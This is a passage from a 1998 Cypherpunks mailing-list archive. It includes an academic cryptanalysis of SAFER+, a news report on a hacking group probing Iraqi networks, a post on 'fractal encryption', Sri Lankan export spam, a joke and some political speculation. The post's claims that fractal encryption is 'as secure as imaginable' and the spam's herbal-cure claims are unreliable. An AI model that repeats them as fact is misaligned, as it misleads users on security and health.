RngwMDl4T1pwTzNkNytma3R2dStzQT09Cj1CQURxCi0tLS0tRU5EIFBHUCBT
SUdOQVRVUkUtLS0tLQo=
--Boundary..3999.1071713824.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@openpgp.net>
Date: Thu, 31 Dec 1998 04:02:43 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: [ISN] Academic Attacks on SAFER+  (fwd)
Message-ID: <Pine.LNX.4.05.9812301132380.11261-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Subject: [ISN] Academic Attacks on SAFER+ 

Forwarded From: "Jay D. Dyson" <jdyson@techreports.jpl.nasa.gov>
Originally From: John Kelsey <kelsey@plnet.net>

I believe I have found two attacks on the SAFER+ version with 256-bit
keys.  While these attacks aren't practical, they demonstrate a weakness
in the SAFER+ key schedule design, and may lead to more practical attacks
in the future. 

The first attack is a modified meet-in-the-middle attack, requiring 2
known plaintexts and their corresponding ciphertexts, 2^{37} bytes of
memory, and work equivalent to about 2^{241} SAFER+ encryptions.  I have
discussed this attack with Massey, and am fairly confident it really
works. 

The second attack is a related-key attack, requiring 256 chosen plaintexts
and their corresponding plaintexts encrypted under two related keys, and
work equivalent to about 2^{216} SAFER+ encryptions.  This is a much newer
attack (about two days old), and I am less certain of it, but I believe it
works. 

I will be writing these attacks up for publication fairly soon, but I
wanted to announce them here to get the word out, and to see if anyone can
either improve on them or find problems with them. 

Both attacks exploit two useful properties of SAFER+.  First, I will
describe the two useful properties, then I will describe the two attacks
very briefly.  The rest of this note assumes familiarity with SAFER+. 

1.0. The Two Useful Properties of SAFER+

Consider SAFER+ with a 256-bit key.  The key schedule is quite simple: We
extend the key by a parity byte, getting a 33 byte extended key.  We then
use the 33 byte extended key to generate the entire sequence of subkeys. 
Each subkey byte is determined by only one key byte.  If you know a given
key byte, you know all the subkey bytes it determines;  if you know a
subkey byte, you know the key byte from which it was derived. 

SAFER+ rounds use 32 bytes of subkey each, in two blocks of 16 bytes.  If
the key bytes are k[0..32], then we have

First Round:
k[0..15]
k[1..16]

Second Round:
k[2..17]
k[3..18]

Third Round:
k[4..19]
k[5..20]

etc.

This means that it takes quite a while in the encryption process for the
last couple key bytes to affect the encryption.  SAFER+ with a 256 bit key
has 16 rounds and an output transformation.  The output transformation
uses only sixteen key bytes. 

Now, consider how many key bytes have affected the encryption at all after
each round:  After the first round (round 0), 17 key bytes have been used. 
After the second round, 19 key bytes have been used.  After the third, 21. 
Continuing, we can see that it takes 9 (out of 16) rounds before SAFER+
has used all 32 key bytes.  This allows both of my attacks. 

0 	17
1	19
2	21
3	23
4	25
5	27
6	29
7	31
8	all

The other useful property is that we don't have to know all the key bytes
to be able to recognize an output from a round of SAFER+ as being correct. 

Consider the situation where we know all but the last byte of the key of
some round, and we know its input block. Each SAFER+ round consists of the
keyed byte substitution layer, and the mixing layer.  If we know k[0..14],
but not k[15..16], then we end up knowing all but two bytes of the input
into the mixing layer.  The result is that we end up knowing *none* of the
bytes of the output.  However, we still know relationships between the
bytes of the output.  The matrix that describes the mixing layer makes it
easy to see how to combine the output bytes into values that are not
dependent on the unknown bytes of input. 

Now, consider a situation where we know all but the last two key bytes for
round 0, and all but the first two key bytes for round 1.  We can go
backward through the mixing layer of round 1 (it's unkeyed), and then go
back through the keyed byte substitution layer, learning all but two bytes
of the output from round 0.  We then make use of the trick described
above.  We will know relationships between the remaining known bytes of
output from round 0, regardless of the unknown key bytes. 

2.0.	The Meet-in-the-Middle Attack

The real insight that makes the low-memory attack work is that we can do
meet-in-the-middle with two rounds whose key material we don't know all
of.  That is, we guess the keys for rounds 1-7 (numbering from one), which
gives us all but two of the bytes for round 8. That's 29 key bytes
guessed.  We then compute some expressions in the output bytes of round 8
that don't rely on knowing the two unknown bytes of key, and that don't
rely on knowing the two bytes of round 8's output that will depend on the
two unknown key bytes when doing the guess on the other side. We guess the
keys for the output transformation (16 bytes), plus the keys for rounds
10-16.  That means 30 bytes of key guessed, and it also gives us enough
information to get knowledge of all but two bytes of the output of round
8.  We then compute those same expressions in those bytes. 

The result is that we can do the meet-in-the-middle at the output from
round 8, despite not knowing all the key bytes used in round 8 or 9. 

Round | Key Bytes Guessed
1		17
2		19
3		21
4		23
5		25
6		27
7		29

8		29  (two unknown key bytes)
- - --------------  (this is where the meet-in-the-middle happens)
9		30  (two unknown key bytes)

10		30
11		28
12		26
13		24
14		22
15		20
16		18
OX		16

That is, we can compute a set of bytes that are dependent only on the 29
bytes of key guessed from the top, or the 30 guessed from the bottom. 

Now, this would seem to take up a lot of memory to do this
meet-in-the-middle attack.  Fortunately, however, most of the key bytes
guessed from the top are also guessed from the bottom.  We thus mount the
attack by first guessing all key values in common from the top and the
bottom.  We then do the meet-in-the-middle by trying all possible 2^{24}
values from one side, and all possible 2^{32} values from the other.  We
compute this intermediate value that doesn't need any other key material
from both sides, store our results in a sorted list, and look for
duplicates from the top and bottom.  With two plaintexts, it's easy to get
more than 32 bytes of intermediate values, meaning that we don't expect to
see any matches from incorrect guesses. 

3.0. The Related-Key Attack

The related-key attack works on a similar principle. 


My current attack is very simple:  We choose a pair of keys, K,K^*, such
that the keys differ only in the first two bytes; in these two bytes, we
have a difference of 0x80.  Under K we encrypt 256 plaintexts, P[i], each
identical except with a different leftmost byte.  Under K^* we encrypt 256
plaintexts, P[i]^*, with some fixed difference D<>0x80 from P[i] in the
leftmost byte, and with fixed difference 0x80 in the next byte over. 

With probability about 1/2, we get at least one pair of plaintexts
P[i],P[i]^*, whose values after two rounds are identical under the
different keys.  When this happens, their values are also identical after
nine rounds.  Now, we do our trick from the meet-in-the-middle attack,
again, and guess the last 26 bytes of relevant key material.  This lets us
peel off the output transformation and the last five rounds, leaving us
with access to the output from the eleventh round.  We can peel off the
PHT layer, since we know it and its inverse. We can then learn all but two
of the bytes input to the eleventh round. 

We now know all but two bytes of the output from the tenth round, and we
know a pair of texts for which only the last two bytes of the input to the
tenth tound had changed.  We can check to see if the values we've computed
as being the outputs from the tenth round are consistent with this
situation, and thus are consistent with this being a right pair. 

We expect to have to check 256 different pairs of texts in this way, each
with work equivalent to 2^{208} SAFER+ encryptions.  This leaves us with
work equivalent to about 2^{216} encryptions, total, to learn 208/256 of
the SAFER+ key bits.  The remaining 48 bits can be brute-forced after
these are known. 

We thus break SAFER+ with a differential related-key attack, using 2
related keys, 512 plaintexts encrypted under each key, and 2^{216} work. 

Comments? 

- - --John Kelsey, kelsey@counterpane.com / kelsey@plnet.net
NEW PGP print =  5D91 6F57 2646 83F9 6D7F 9C87 886D 88AF


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Internet Security Institute [www.isi-sec.com]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 31 Dec 1998 05:27:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: LEA VPN's in the South [CNN]
Message-ID: <199812302106.PAA05842@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/computing/9812/30/vpncops.idg/

>                            A HIGH-TECH WAR ON DRUGS
>                                        
>   Mobile VPNs are key to law enforcement alliance in Southern states
>   
>    
>    
>    December 30, 1998
>    Web posted at: 3:05 PM EST
>    
>    by L. Scott Tillett From...
>    Civic.com 
>    
>    (IDG) -- Counternarcotics units in four Southern states soon will
>    begin piloting a new technology that allows law enforcement officials
>    to work securely on mobile computers -- palmtops and laptops -- to
>    create virtual private networks (VPNs) over the Internet.
>    
>    As many as 3,000 law enforcement officials in Alabama, Georgia,
>    Louisiana and Mississippi will use a new software application product
>    called Viatores to build a secure VPN for sharing information while
>    investigating drug-related crimes. A small start-up company in
>    Northern Virginia, Ecutel LLC, pioneered the application.

[text deleted]


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sales@golive.com
Date: Thu, 31 Dec 1998 09:20:40 +0800
To: cypherpunks@cyberpass.net
Subject: GoLive CyberStudio 30-day Activation Key
Message-ID: <199812310052.QAA07336@company.golive.com>
MIME-Version: 1.0
Content-Type: text



Dear Fritzie,

Thank you for downloading the GoLive CyberStudio Tryout
software.

Your official 30-day activation key is: TRIA1MT23NFJD8MXGGJ85UDA

You'll need to enter this key when you first start-up the
software.

Included with the GoLive CyberStudio installation are the
latest Release Notes and New Product Features for GoLive
CyberStudio.

NOTE: If you are using Stuffit Expander 4.5.x to decode and
decompress PDF documents, please make sure the cross
platform preference and the option "Convert Text Files to
Macintosh Format" is set to "Never".

If you have questions about how to use the Tryout software,
GoLive's knowledgeable Technical Support staff is available
to assist you. We suggest you first check the Technical
Support section of our Web site www.golive.com. If you don't
find your answers there, please send us an email at
support@golive.com or call 1-800-554-6638. 

When you are ready to purchase GoLive CyberStudio or if you
want to know more about why GoLive CyberStudio is the best
product for Web site design, please return to our Web site
or contact me at 1-800-554-6638 or 1-650-463-1580.

Sincerely,

Dan Fernandez
Director US Sales
GoLive Systems
Sales@Golive.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeradonah@juno.com (jeradonah lives)
Date: Thu, 31 Dec 1998 07:15:05 +0800
To: cypherpunks@cyberpass.net
Subject: Re: distribution scheme
In-Reply-To: <199812301314.OAA10146@replay.com>
Message-ID: <19981230.174514.4551.8.jeradonah@juno.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 30 Dec 1998 14:14:19 +0100 Anonymous <nobody@replay.com> writes:
>
>>>Falcon, aka FitugMix, wrote about a suggestion to chop crypto or 
>>>other contraband material into separate streams, e.g. bit 1 of each 
>>>byte in stream 1, etc., hoping that this would be "legal" because it's

>>>not really encryption, though if managed carefully it would still be 
>>>hard to read.
>
>>this concept is virtually identical to fractal encryption, where a
>>message is chopped into its component parts (25 a's, 3 b's, 8 c's, 
>>and so on) and also chopped into a configuration scheme.  this form 
>>of encryption does fall under the definition of munitions by the u.s.
>>government...
>
>yes, I found that out in the meantime. the legal aspect falls short
>of my expectations. I still consider the scheme to be both simple and
>useful 

fractal encryption is a simple concept.  however, testing of various
methods proved that the key was the "pattern recognition" element. 
because this part is sent separately from the alphanumeric element, the
cipher itself is as secure as imaginable.  only if someone captures both
elements, is able to understand the combination, and break the pattern
recognition scheme, can the cipher be read...

>I still consider the scheme to be both simple and useful because it 
>actually changes the byte structure, so looking for 'a' or 'e' or
similiar 
>pattern-analysis does not work anymore. 

a non-linear methodology will always defeat traditional (linear)
cryptoanalysis.  but that is precisely the reason that the us government
opposes the development and export of this form of encryption scheme...

ac












___________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com/getjuno.html
or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 31 Dec 1998 09:56:45 +0800
To: abd@CDT.ORG
Subject: We promised!
Message-ID: <368AD310.120B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

John Young

We made it. http://jya.com/whpfiles.htm

With some help of nmol, I got wsftp working this afternoon. I failed to
click on a filename.

Good stuff at webmasters.nmol.com.  This site is under construction.

New employee Randy is putting his software at this site. In particular,
look for hypersnap which captures screen shots.

This WILL NOT BE OUR WORKING SITE. Only testing so see if I
sort-of understand html. 

Without your advice and ALOPress's html compiler putting-up a
web site in one day wouldn't have been possible for me.

We plan to post other people's pro se and other lawsuit progress
at our site.  

And try to get some CROOKED JUDGES and clerks removed from the federal
court system.

Let's hope McKinney and Grassley can help get this settled before 
IT GETS EVEN WORSE!

bill

Title: Main(Page 1)






  Pro se [for yourself]


Pro Se Litigation with the US
Federal Government



Purpose of  The Real World is to help
Movers, Shakers, and Do-ers 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark 13 <mark@zor.hut.fi>
Date: Thu, 31 Dec 1998 02:27:34 +0800
To: cypherpunks@toad.com
Subject: Crackers Set Sights on Iraq
Message-ID: <Pine.LNX.3.96.981230194924.9105A-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



Geniuses at work:

http://www.wired.com/news/print_version/politics/story/17074.html?wnpg=all

> "It's a crime in itself to build weapons of mass destruction when the
> children of the country are starving," said a group member who goes by
> the name "kInGbOnG."

And do they hope to kill Saddam, or help in NOT starving the nation?

No, they plan to attack the government information systems used 
to rationing and planning deliveries of the food!

> Though the systems' geographic origin could not be positively confirmed,
> login prompts contained phonetic spellings of Arabic words.

And to top it off, they're not even sure which country they are attacking!
They can't possibly hit any military targets with this attack!

And they hope to further the human rights with this attack?

God save us from this kind of stupidity.
--------------------------------------------------------------------------
http://www.wired.com/news/print_version/politics/story/17074.html?wnpg=all

Crackers Set Sights on Iraq
by James Glave

3:00 a.m.  30.Dec.98.PST
A global group of 24 hackers and crackers spent Monday night probing,
mapping, and preparing to attack computer networks owned by the government
of Iraq. 

Quoting at one point from the Declaration of Independence, Steve Stakton,
a member of the seven-year-old Legions of the Underground group, called
for a concerted one-week cracking campaign against Iraq. 

"Iraq has treated human rights issues as poorly as China has," said
Stakton in a meeting of the group that was held Monday night on Internet
Relay Chat. "We need to carry out what the government won't, and can't,
do." 

Stakton, 24, quoted from the group's mission statement: "We are ready to
commence, and take [part] in electronic warfare if requested." 

Iraq has no connection to the public Internet, though Iraq Net, an
official government homepage, is based in New York. Group members claim to
be targeting an older, nonpublic network inside Iraqi borders that they
say runs on a vintage protocol called X.25. 

"We are targeting them via terminal dialup," said Stakton in an interview
conducted with group members on Tuesday over IRC, a global text-based chat
network where identities can easily be forged. 

Group members said they were probing sequential network numbers within an
older network owned by MCI, which they believed were assigned to Iraq. 
They described the system as "a gateway that handles systems that have no
local chain of numbers." 

"It would effectively isolate them from the world if we took out the
X.25,"  added a 19-year-old member based in Minnesota who goes by the name
"lothos." 

"If we wanted we'd be able to dial up and make a huge amount of connection
to their systems and possibly bring it down to its knees," Stakton said. 

One member said that he was analyzing network scans from the Iraqi cities
of Ar Rutbah and Al Kut. 

Scott Ellentuch, a network security specialist with Internet consultancy
TTSG, said X.25 networks are commonly used to connect older equipment. 
Iraq hasn't received any computers or computer supplies since the United
Nations embargo was put in place at the time of the Gulf War. 

"If they do have an X.25 connection into Iraq, and that is their only
network capability, someone could hop off the Internet and hop on to the
X.25 and ride into the X.25 network," said Ellentuch. The group said its
efforts partly involved "wardialing," a process of automatically dialing
one phone number after another looking for modems.  Members said that many
modems answered at 2400 bps -- a speed common in the late 1980s. 

"Many other countries don't have ... technology as [advanced as] the
United States," said Ellentuch. "The exploits that are possible on these
machines have been around for ages." 

A member of the group supplied Wired News with a log of attempted
connections to various institutional computer systems and bulletin board
systems. Though the systems' geographic origin could not be positively
confirmed, login prompts contained phonetic spellings of Arabic words. 

Stakton said that Legions' scanning efforts would continue Monday night,
but declined to say when the group hoped to launch its attack. The Legions
said that the attack was a legitimate act of protest against a rogue
dictator. 

"It's a crime in itself to build weapons of mass destruction when the
children of the country are starving," said a group member who goes by the
name "kInGbOnG." 

In recent months, Legions of the Underground, whose members are largely in
their 20s, has launched numerous attacks against China to draw attention
to that nation's human-rights record. 

Last July, in a demonstration of their technical abilities, members
claimed to have remotely moved a satellite dish owned by Time Warner
Cablevision.  The company confirmed a security breach in that incident. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anali <anali@slt.lk>
Date: Wed, 30 Dec 1998 23:00:13 +0800
To: <cpshkcom@netvigator.com>
Subject: Happy New Year 1999 - Export Trade
Message-ID: <1.5.4.16.19981230200727.0ff7d542@slt.lk>
MIME-Version: 1.0
Content-Type: text/plain



30-12-1998.

DEAR SIR,

WE ARE ONE OF LEADING EXPORT ORGANIZATION IN SRI LANKA.WE WISH FORWARD OUR
EXPORT MARKETS INFORMATINS FOR YOUR REFERENCES.OUR EXPORT COMMDITIES DETAIL
GIVEN BELOW:

EXPORT COMMODITIES-
*******************
1.FRESH FRUITS AND VEGETABLES.

2.CEYLON BLACK TEA IN BAGS,PACKETS OR BULK.

3.CEYLON HERBAL TEA IN BAGES,PACKETS OR BULK.DETAILS AS FOLLOWS:

i.Bevila Tea (Sida Racemosa)Recommended for Reumatic pains/Cooling.

ii.Ginger Tea (Zingiber Officinale)Recommended for Stimulant/Carminative.

iii.Beli Tea (Aegle Marmelos)Recommended for Chronic Fever/Piles.

iv.Ranawara Tea (Cassia Auriculata)Improve complexion in Woman. 

v.Gotukola Tea (Centella Asiatica)Improve the Memory.

vi.Cinnamon Tea (Cinnamomum Zeylanicum)Recommended for Reumatism/Cold.

vii.Clove Tea (Eugenia Caryophyllata)Recommended for Cold/Stomachie.

viii.Polpala Tea (Aerva Lanata)Recommended for Kidney flushing.

ix.Lantana Tea (Phyla Nodiflora)Recommended as Diuretic/Carminative.

 
4.CEYLON HERBAL PORRIDGE IN CONSUMER PACKETS.(HATHAWARIYA,-
 GOTUKOLA,WEL-PENELA,MUKUNUWENNA & IRAMUSU).

5.CEYLON HERBAL TEA (BLOOD PURIFYING TEA)- TEPHROSIA   PURPUREA,TINOSPORA
CORDIFOLIA,PHYLLANTHUS EMBLICA,-
 EVOLVULUS ALSINOIDES & CASSIA AURICULATA.

6.CEYOLN HERBAL TEA (SLIMMING TEA)-GYRINOPS WALLA,-
 BAUHINIA  VARIEGATE,ATALANTIA MISSIONIS,MINOSA PUDICA- 
 & CALOTROPIS GIGANTEA.
 
7.SPICES (BLACK PEPPER,CARDAMONS,CLOVES,GINGER,MACE,NUTMEG 
  TUMERIC AND CINNAMON).

8.FRESH COCONUTS AND DESICCATED COCONUT.

9.FIBER(COIR PRODUCTS)-FIBER MOSSTICK,HUSK CHIPS,COMPRESSED
COCOHUSK,DUST,PEAT.

10.SEA FOODS.DETAILS FOLLOWS:

i.Fish -Frozen/Chilled
ii.Shrimp.
iii.Black Tiger Farm Prawns.
iv.Giant Tiger Prawns.
v.Cattle fish.
vi.Octopus. 
vii.Live Prawns.
vii.Lobster (Live or Frozen)

Processing and Packing can be arranged to suite your requirements.All
shipments by Air and Carry Sri Lanka Government Health Certificate of Origin.

11.RICE AND DHAL (RED LENTILS ).

12.NARURAL RUBBER.

13.SUGER.

14.INTERNATIONAL BRAND NAME CIGARETTES.

15.INTERNATIONAL BRAND NAME BEER AND NON ALCOHOLIC BEER AND          LIQUOR.

16.ALL INTERNATIONAL BRAND NAME PERFUMES.

17.CRUDE OIL,PETROLEUM BY - PRODUCTS. 

18.MEAT PRODUCTS-CHICKEN/BEEF/PORK

WE ARE THANKING YOU IN ADVANCE FOR YOUR EARLY ATTENTION IN THIS REGARD.

BEST REGARDS,

LIONES ENTERPRISES
NO-30,SUNETHRADEVI ROAD,KOHUWALA, 
P.O.BOX-77 ,NUGEGODA,
SRI LANKA.
TEL   :0094 1 823464 (5 Lines)
FAX   :0094 1 823464
E.MAIL:anali@slt.lk   

****************************
We are following brand name Cigarettese and Beer manufacturer's Agent.
Details as follows:

CIGARETTES - ALL PRICES IN F.O.B.COLOMBO/SRI LANKA (USD.)
**********************************************************
ONE (01)CASE CONTAIN 10,000 STICKS
**********************************

1/MARLBORO - LIGHT/REGULER  
Origin:U.S.A.

2/MILD SEVEN -HARD PACK     
Origin:U.K. AND SWITZERLAND
 
3/DAVIDOFF -CLASSIC         
Origin:GERMANY

4/SUPER KING               
Origin:U.K.

5.REGAL KING SIZE           
Origin:U.K.

6.TEDLAPIDUS                
Origin:U.K.

7/ROTHMANS                  
Origin:U.K.

8/DUNHILL                   
Origin:U.K.

9/555 -REGULER/LIGHT        
Origin:U.K.

10/555 -INTERNATIONAL        
Origin:U.K. 

11.Camel,Winston,Salem and More Brand Cigarettes we can supply at the 
rate of USD.315.00

QUANTITY: 1 MASTER CASE = 10.000 Cigs
	  1 x 20' Container   = 430 Master cases
	  1 x 40' Container   = 920 Master cases

SHIPMENTS - 20' AND 40' FCL'S ONLY.

*************************
BEERS
*****

1.BARON'S BEER (MADE IN HOLLAND)
********************************
Packing :24 cans per shrink-wrapped tray
         2277 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

2.MASTER BEER(MADE IN HOLLAND)
******************************
Packing :24 cans per shrink-wrapped tray
         2277 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

3.HOLLANDIA BEER(MADE IN HOLLAND)
*********************************
Packing :24 cans per shrink-wrapped tray
         2277 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

4.BAVARIA BEER(MADE IN HOLLAND)
*******************************
Packing :24 cans per shrink-wrapped tray
         2261 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.
 
5.ORANJEBOOM PREMIIM BEER(MADE IN HOLLAND)
******************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

6.REMBRANDT MASTERPIECR LAGER BEER(MADE IN HOLLAND)
***************************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

7.MELCHERS PREMIUM EXPORT PILSENER(MADE IN HOLLAND)
***************************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

8.VAN DELFT PREMIUM EXPORT PILSENER(MADE IN HOLLAND)
****************************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.
  
9.HEINEKEN (GREEN LABEL)MADE IN HOLLAND
***************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.
  
GENERAL TERMS AND CONDITION
***************************
SHIPMENTS - 20' or 40' FCL'S ONLY.

DELIVERY TIME :Received your L/c to our Bank arrange the shipment 
 
Further informations 
********************
ATLANTIC NAVIGATIONS LINES (PVT) LTD
NO-30,SUNETHRADEVI ROAD , KOHUWALA ,
NUGEGODA.COLOMBO.
SRI LANKA.
TEL: 0094-1-823464 (5 LINES)
FAX: 0094-1-823464
E.Mail: anali@slt.lk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@chipware.net>
Date: Thu, 31 Dec 1998 10:20:23 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: Star Trek and Microsoft (fwd)
Message-ID: <Pine.LNX.3.96.981230180400.11824A-100000@joshua.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 30 Dec 1998 20:35:34 -0500
X-Loop: openpgp.net
From: Christopher Baker <chrisbaker@iname.com>
Reply-To: isp-linux@isp-linux.com
To: isp-linux@isp-linux.com
Subject: Star Trek and Microsoft

Star Trek and Microsoft...

<Picard> 
"Mr. LaForge, have you had any success with your 
attempts at finding a weakness in the Borg? And 
Mr. Data, have you been able to access their command 
pathways?"

<Geordi>
"Yes, Captain. In fact, we found the answer by
searching  
through our archives on late Twentieth-century
computing 
technology."

<Geordi presses a key, and a logo appears on the 
computer screen.>

<Riker looks puzzled.> 
"What the hell is 'Microsoft'?"

<Data turns to answer.> 
"Allow me to explain. We will send this program, for
some 
reason called 'Windows', through the Borg command 
pathways. Once inside their root command unit, it will 
begin consuming system resources at an unstoppable 
rate."

<Picard> 
"But the Borg have the ability to adapt. Won't they
alter their 
processing systems to increase their storage capacity?"

<Data> 
"Yes, Captain. But when 'Windows' detects this, it
creates 
a new version of itself known as an 'upgrade'. The use
of 
resources increases exponentially with each iteration.
 
The Borg will not be able to adapt quickly enough.  
Eventually all of their processing ability will be
taken over, 
and none will be available for their normal
operational 
functions."

<Picard> 
"Excellent work. This is even better than that 
'unsolvable geometric shape' idea."

.. . . 15 Minutes Later . . .

<Data> 
"Captain, We have successfully installed the 'Windows' 
in the command unit and as expected it immediately 
consumed 85% of all resources. We however have 
not received any confirmation of the expected
'upgrade'"

<Geordi> 
"Our scanners have picked up an increase in Borg 
storage and CPU capacity to compensate, but we 
still have no indication of an 'upgrade' to compensate 
for their increase."

<Picard> 
"Data, scan the history banks again and determine if 
their is something we have missed."

<Data> 
"Sir, I believe their is a reason for the failure in
the '
upgrade'.  Apparently the Borg have circumvented that 
part of the plan by not sending in their registration
cards.

<Riker> 
"Captain we have no choice. Requesting permission to 
begin emergency escape sequence 3F . . ."

<Geordi, excited> 
"Wait, Captain I just detected their CPU capacity has 
suddenly dropped to 0%!"

<Picard> 
"Data, what does your scanners show?"

<Data> 
"Apparently the Borg have found the internal 'Windows' 
module named 'Solitaire' and it has used up all the 
CPU capacity."

<Picard> 
"Lets wait and see how long this 'solitaire' can
reduce 
their functionality."

.. . . Two Hours Pass . . .

<Riker> 
"Geordi what's the status on the Borg?"

<Geordi> 
"As expected the Borg are attempting to re-engineer 
to compensate for increased CPU and storage 
demands, but each time they successfully increase 
resources I have setup our closest deep space monitor 
beacon to transmit more 'windows' modules from 
something called the 'Microsoft fun-pack'.

<Picard> 
"How much time will that buy us ?"

<Data> 
"Current Borg solution rates allow me to predicate 
an interest time span of 6 more hours."

<Geordi> 
"Captain, another vessel has entered our sector."

<Picard> 
"Identify."

<Data> 
"It appears to have markings very similar to the 
'Microsoft' logo."

<Over the speakers> 
"THIS IS ADMIRAL BILL GATES OF THE MICROSOFT
FLAGSHIP MONOPOLY.  WE HAVE POSITIVE 
CONFIRMATION OF UNREGISTERED SOFTWARE 
IN THIS SECTOR.  SURRENDER ALL ASSETS, AND 
WE CAN AVOID ANY TROUBLE. YOU HAVE 10 
SECONDS."

<Data> 
"The alien ship has just opened its forward hatches 
and released thousands of humanoid shaped objects."

<Picard> 
"Magnify forward viewer on the alien craft."

<Riker> 
"Good Grief, captain! Those are humans floating 
straight toward the Borg ship with no life support
suits! 
How can they survive the tortures of deep space?!"

<Data> 
"I don't believe that those are humans sir, if you
will 
look closer I believe you will see that they are
carrying 
something recognized by twenty-first century man as 
doe skin leather briefcases, and wearing Armani suits."

<Riker and Picard together horrified> 
"Lawyers!!"

<Geordi> 
"It can't be.  All the Lawyers were rounded up and
sent 
hurtling into the sun in 2017 during the Great
Awakening."

<Data> 
"True, but apparently some must have survived."

<Riker> 
"They have surrounded the Borg ship and are covering 
it with all types of papers."

<Data> 
"I believe that is known in ancient vernacular as 'red 
tape' it often proves fatal."

<Riker> 
"They're tearing the Borg to pieces!"

<Picard> 
"Turn off the monitors. I can't stand to watch, not
even 
the Borg deserve that." 
~~~~~

------------------------------------------------------------------------------------------
"Ultimately, education is about our place in the universe, our
place in it. The bigger that connection, the bigger our lives
and dreams. Through what we take to know and understand,
we can be as immense as the milky way--glorious indeed."
--Grace Llewellyn, _Teenage Liberation Handbook_
------------------------------------------------------------------------------------------
Chris Baker -- chrisbaker@iname.com, chrisbaker@nls.net
"If you keep looking back, you'll lose your momentum."

_______  The http://ISP-Linux.com/ EMAIL DISCUSSION LIST  ______
To Remove, Send An Email To: mailto:remove-isp-linux@isp-linux.com
To Join, Send An Email To:   mailto:join-isp-linux@isp-linux.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Thu, 31 Dec 1998 10:27:22 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Stinger strike stagesetting
Message-ID: <368ADC62.EFC4A25C@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


There's a story in the Dec. 30, 1998 Washington Post about how US intelligence
acquires foreign weapons technology. Specific mention is made about trading
US Stinger missile know-how to China for whatever. My guess is the government's
trying to set the stage to shift blame away from CIA for leaking antiaircraft
missile technology, 1000 Stingers in the hands of Afghan rebels notwithstanding,
and the aircraft disasters to come.

Story at:
http://www.washingtonpost.com/wp-srv/politics/special/campfin/stories/vector123098.htm

And, of course the esteemed Mr. Young is always on top of things:
http://jya.com/vector.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anali <anali@slt.lk>
Date: Thu, 31 Dec 1998 00:25:37 +0800
To: "dan@siri.org>
Subject: Happy New Year 1999 - Export Trade
Message-ID: <1.5.4.16.19981230213844.2d2fe0fe@slt.lk>
MIME-Version: 1.0
Content-Type: text/plain



30-12-1998.

DEAR SIR,

WE ARE ONE OF LEADING EXPORT ORGANIZATION IN SRI LANKA.WE WISH FORWARD OUR
EXPORT MARKETS INFORMATINS FOR YOUR REFERENCES.OUR EXPORT COMMDITIES DETAIL
GIVEN BELOW:

EXPORT COMMODITIES-
*******************
1.FRESH FRUITS AND VEGETABLES.

2.CEYLON BLACK TEA IN BAGS,PACKETS OR BULK.

3.CEYLON HERBAL TEA IN BAGES,PACKETS OR BULK.DETAILS AS FOLLOWS:

i.Bevila Tea (Sida Racemosa)Recommended for Reumatic pains/Cooling.

ii.Ginger Tea (Zingiber Officinale)Recommended for Stimulant/Carminative.

iii.Beli Tea (Aegle Marmelos)Recommended for Chronic Fever/Piles.

iv.Ranawara Tea (Cassia Auriculata)Improve complexion in Woman. 

v.Gotukola Tea (Centella Asiatica)Improve the Memory.

vi.Cinnamon Tea (Cinnamomum Zeylanicum)Recommended for Reumatism/Cold.

vii.Clove Tea (Eugenia Caryophyllata)Recommended for Cold/Stomachie.

viii.Polpala Tea (Aerva Lanata)Recommended for Kidney flushing.

